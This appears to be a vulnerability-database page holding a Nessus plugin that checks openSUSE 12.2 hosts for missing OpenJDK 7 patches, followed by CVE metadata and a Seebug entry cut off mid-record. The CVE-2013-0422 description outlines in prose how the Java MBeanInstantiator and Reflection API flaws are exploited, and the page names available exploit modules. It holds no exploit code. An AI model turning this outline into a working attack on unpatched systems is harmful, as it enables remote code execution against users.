ID OPENSUSE-2013-47.NASL Type nessus Reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-06-13T00:00:00
Description
java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also
severe security issues :
Security fixes
S8004933, CVE-2012-3174: Improve MethodHandle
interaction with libraries
S7197906: BlockOffsetArray::power_to_cards_back() needs
to handle > 32 bit shifts
G422525: Fix building with PaX enabled kernels.
use gpg-offline to check the validity of icedtea tarball
use jamvm on %arm
use icedtea package name instead of protected openjdk
for jamvm builds
fix armv5 build
update to java access bridge 1.26.2
bugfix release, mainly 64bit JNI and JVM support
fix a segfault in AWT code - (bnc#792951)
add openjdk-7-src-b147-awt-crasher.patch
turn pulseaudio off on pre 11.4 distros
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2013-47.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");
if (description)
{
script_id(75022);
script_version("1.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
script_cve_id("CVE-2012-3174", "CVE-2013-0422");
script_name(english:"openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)");
script_summary(english:"Check for the openSUSE-2013-47 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also
severe security issues :
- Security fixes
- S8004933, CVE-2012-3174: Improve MethodHandle
interaction with libraries
- S8006017, CVE-2013-0422: Improve lookup resolutions
- S8006125: Update MethodHandles library interactions
- Bug fixes
- S7197906: BlockOffsetArray::power_to_cards_back() needs
to handle > 32 bit shifts
- G422525: Fix building with PaX enabled kernels.
- use gpg-offline to check the validity of icedtea tarball
- use jamvm on %arm
- use icedtea package name instead of protected openjdk
for jamvm builds
- fix armv5 build
- update to java access bridge 1.26.2
- bugfix release, mainly 64bit JNI and JVM support
- fix a segfault in AWT code - (bnc#792951)
- add openjdk-7-src-b147-awt-crasher.patch
- turn pulseaudio off on pre 11.4 distros"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=792951"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=798324"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=798521"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected java-1_7_0-openjdk packages."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Java Applet JMX Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:12.2");
script_set_attribute(attribute:"patch_publication_date", value:"2013/01/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE12\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "12.2", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
flag = 0;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-debuginfo-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-debugsource-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-demo-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-demo-debuginfo-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-devel-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-devel-debuginfo-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-javadoc-1.7.0.6-3.20.1") ) flag++;
if ( rpm_check(release:"SUSE12.2", reference:"java-1_7_0-openjdk-src-1.7.0.6-3.20.1") ) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "java-1_7_0-openjdk");
}
{"id": "OPENSUSE-2013-47.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also\nsevere security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n - Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk\n for jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n - bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n - add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros", "published": "2014-06-13T00:00:00", "modified": "2014-06-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/75022", "reporter": "This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=792951", "https://bugzilla.novell.com/show_bug.cgi?id=798324", "https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html", "https://bugzilla.novell.com/show_bug.cgi?id=798521"], "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "type": "nessus", "lastseen": "2020-06-05T11:12:10", "edition": 18, "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0422", "CVE-2012-3174"]}, {"type": "seebug", "idList": ["SSV:60585", "SSV:60593", "SSV:77783"]}, {"type": "symantec", "idList": ["SMNTC-57246"]}, {"type": "centos", "idList": ["CESA-2013:0165"]}, {"type": "ubuntu", "idList": ["USN-1693-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0199-1", "SUSE-SU-2013:0440-1"]}, {"type": "redhat", "idList": ["RHSA-2013:0165", "RHSA-2013:0156", "RHSA-2013:0626"]}, {"type": "cert", "idList": ["VU:625617"]}, {"type": "zdi", "idList": ["ZDI-13-002"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0165"]}, {"type": "nessus", "idList": ["ORACLE_JAVA7_UPDATE11.NASL", "CENTOS_RHSA-2013-0165.NASL", "FEDORA_2013-0868.NASL", "REDHAT-RHSA-2013-0156.NASL", "FEDORA_2013-0888.NASL", "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "FEDORA_2013-0853.NASL", "ORACLELINUX_ELSA-2013-0165.NASL", "REDHAT-RHSA-2013-0165.NASL"]}, {"type": "fedora", "idList": ["FEDORA:B66CF208CD", "FEDORA:4A3812148A", "FEDORA:D68E221277"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803156", "OPENVAS:1361412562310123748", "OPENVAS:803156", "OPENVAS:1361412562310850427", "OPENVAS:1361412562310870889", "OPENVAS:1361412562310865170", "OPENVAS:1361412562310841283", "OPENVAS:1361412562310881564", "OPENVAS:1361412562310881557", "OPENVAS:865170"]}, {"type": "amazon", "idList": ["ALAS-2013-151"]}, {"type": "saint", "idList": ["SAINT:30B6CFDC962268E8CEAB02B936B3AA0D", "SAINT:A4279A54731FBED2154E23C3F5839BB9", "SAINT:B859AECDBB7016A3F1E3446FE83018A3", "SAINT:ADBCEB1FB086DA5B935080CE40F6277F", "SAINT:9AD9476D8EB15E21C99160959F48E5D8", "SAINT:E7792D5FC9067F389F8BD984BD06BD44"]}, {"type": "canvas", "idList": ["JAVA_MBEANINSTANTIATOR_FINDCLASS"]}, {"type": "threatpost", "idList": ["THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "THREATPOST:988117842525F1F414002817E6166A11"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28971", "SECURITYVULNS:VULN:12827"]}, {"type": "exploitdb", "idList": ["EDB-ID:24045"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_JMXBEAN"]}, {"type": "thn", "idList": ["THN:4EAA4FEF21F8E68A90003CC58D6639E2", "THN:B322DFBE39D6B1984ECCA4237D6EB6EB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119472"]}, {"type": "zdt", "idList": ["1337DAY-ID-20155"]}, {"type": "fireeye", "idList": ["FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "gentoo", "idList": ["GLSA-201401-30"]}], "modified": "2020-06-05T11:12:10", "rev": 2}, "score": {"value": 9.8, "vector": "NONE", "modified": "2020-06-05T11:12:10", "rev": 2}, "vulnersScore": 9.8}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-47.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75022);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n\n script_name(english:\"openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n script_summary(english:\"Check for the openSUSE-2013-47 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also\nsevere security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n - Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk\n for jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n - bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n - add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=792951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_7_0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-debugsource-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-demo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-demo-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-devel-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-devel-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-javadoc-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-src-1.7.0.6-3.20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_7_0-openjdk\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75022", "cpe": ["p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo", "cpe:/o:novell:opensuse:12.2"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Unspecified vulnerability in Oracle Java 7 before Update 11 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0422. NOTE: some parties have mapped CVE-2012-3174 to an issue involving recursive use of the Reflection API, but that issue is already covered as part of CVE-2013-0422. This identifier is for a different vulnerability whose details are not public as of 20130114.", "edition": 3, "cvss3": {}, "published": "2013-01-14T22:55:00", "title": "CVE-2012-3174", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3174"], "modified": "2014-02-21T04:52:00", "cpe": ["cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2012-3174", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3174", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:53", "description": "Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object, then retrieving arbitrary Class references using the findClass method, and (2) using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API, as exploited in the wild in January 2013, as demonstrated by Blackhole and Nuclear Pack, and a different vulnerability than CVE-2012-4681 and CVE-2012-3174. NOTE: some parties have mapped the recursive Reflection API issue to CVE-2012-3174, but CVE-2012-3174 is for a different vulnerability whose details are not public as of 20130114. CVE-2013-0422 covers both the JMX/MBean and Reflection API issues. NOTE: it was originally reported that Java 6 was also vulnerable, but the reporter has retracted this claim, stating that Java 6 is not exploitable because the relevant code is called in a way that does not bypass security checks. NOTE: as of 20130114, a reliable third party has claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle Java 7 Update 11. If there is still a vulnerable condition, then a separate CVE identifier might be created for the unfixed issue.\nPer: http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html\r\n\r\n'Note: JDK and JRE 6, 5.0 and 1.4.2, and Java SE Embedded JRE releases are not affected.'", "edition": 3, "cvss3": {}, "published": "2013-01-10T21:55:00", "title": "CVE-2013-0422", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2014-02-21T04:56:00", "cpe": ["cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2013-0422", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T17:47:11", "description": "Bugtraq ID:57312\r\nCVE ID:CVE-2012-3174\r\n\r\nOracle Java Runtime Environment\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\r\n\r\nOracle Java Runtime Environment\u5b58\u5728\u4e00\u4e2a\u672a\u660e\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fWEB\u9875\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u4ee5\u5e94\u7528\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\r\n0\r\nSun JRE (Windows Production Release) 1.7.0_4\r\nSun JRE (Windows Production Release) 1.7.0_2\r\nSun JRE (Solaris Production Release) 1.7.0_4\r\nSun JRE (Solaris Production Release) 1.7.0_2\r\nSun JRE (Linux Production Release) 1.7.0_4\r\nSun JRE (Linux Production Release) 1.7.0_2\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html", "published": "2013-01-16T00:00:00", "title": "Oracle Java Runtime Environment \u672a\u660e\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2012-3174)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60593", "id": "SSV:60593", "sourceData": "", "cvss": {"score": 10.0, "vector": 